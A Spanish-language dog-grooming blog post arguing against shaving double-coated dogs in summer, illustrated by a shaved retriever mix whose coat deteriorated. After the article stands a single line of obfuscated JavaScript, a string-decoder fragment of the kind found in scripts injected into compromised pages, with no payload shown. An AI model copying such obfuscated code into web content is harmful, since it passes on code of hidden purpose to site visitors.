Peluquería canina mejorada

Ahora con el buen tiempo comienzan a llenarse las peluquerías caninas de perros anuales que nos piden el “rapaito de verano”. Son ese tipo de perros a los que el pelo les crece hasta una longitud determinada y sus dueños no ven la necesidad de cortar el resto del año. Este tipo de pelo, como ya hemos explicado, son dobles capas a las que no se las puede pasar una máquina.

El motivo por el que nos piden este tipo de servicios es porque anteriormente otros “peluqueros” lo han estado haciendo.

Ya explicamos en este artículo los motivos por los que no se debe realizar este tipo de prácticas en los perros.

Cuando explicamos estos motivos al cliente, normalmente no se nos escucha, porque se basan en su teoría de “siempre se lo hemos hecho y nunca le ha pasado nada”. Hasta el día que pasa, como le pasó a Tronco. Él es un mestizo de retriever de pelo liso. Es ya mayor, y durante los últimos años se le ha estado rapando en verano porque tenía muchos picores. Este es un perro de doble capa que muda, y las mudas fuertes las hacen sobretodo en verano. La solución, no nos cansaremos de decirlo, es CEPILLAR Y CEPILLAR, NO RAPAR. Si rapamos, como ya explicamos en el artículo puesto más arriba, puede ocurrir lo que le pasó a Tronco: mudas cada vez más fuertes, alopecias, malasecia, etc.

Rapar un perro que no se debe rapar no necesariamente da problemas en el momento, pero a largo plazo estamos colaborando en un deterioro continuo que SIEMPRE, algún día, aparece. Y Tronco ha tenido suerte, con un buen tratamiento y dos sesiones de deslanado para estimular el folículo, fue suficiente para que recuperara su pelaje.

Que antiguamente se hicieran esquilados como a las ovejas porque hay que pelar al perro porque pasa calor, no significa que haya que seguir haciéndolo durante toda la vida, a pesar de los estudios y avances que continuamente mejoran la calidad de los servicios, siempre buscando el bienestar de los perros.

Ya no se hacen ese tipo de trabajos porque hay pruebas de que producen problemas de salud. ¿Qué más necesitamos explicar para que vosotros, como propietarios, nos entendáis y actuéis confiando en profesionales, por la salud de vuestra mascota?

Exigir a un peluquero realizar este tipo de corte a un perro es equiparable a pedir en un concesionario un coche sin cinturones, sin abs, sin airbag, etc, porque antiguamente eran todos así.

Todo evoluciona, cambia, se renueva y se mejora. Podemos admitir avances en cosmética como tintes con cada vez menos amoniaco, medicamentos nuevos que curen enfermedades, nuevas cremas con químicos menos abrasivos, que los cirujanos utilicen instrumental nuevo, que mejoren las cirugías debido a la tecnología, podemos admitir que haya cada vez más avances y cosas nuevas en el mundo de la automoción y nos gusta mucho disfrutar de los últimos avances en todo, y cuanto más cómodo y más sano mejor. ¿Por qué con las mascotas no ocurre lo mismo?

Por favor, reflexionad cuando alguien se niegue a hacer este tipo de trabajos, que no es que no quiera trabajar o no sepa hacerlo, es que es un PROFESIONAL que quiere hacer bien su trabajo y no provocar problemas de salud a ningún animal.

 

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}

Add Comment

Your email address will not be published. Required fields are marked *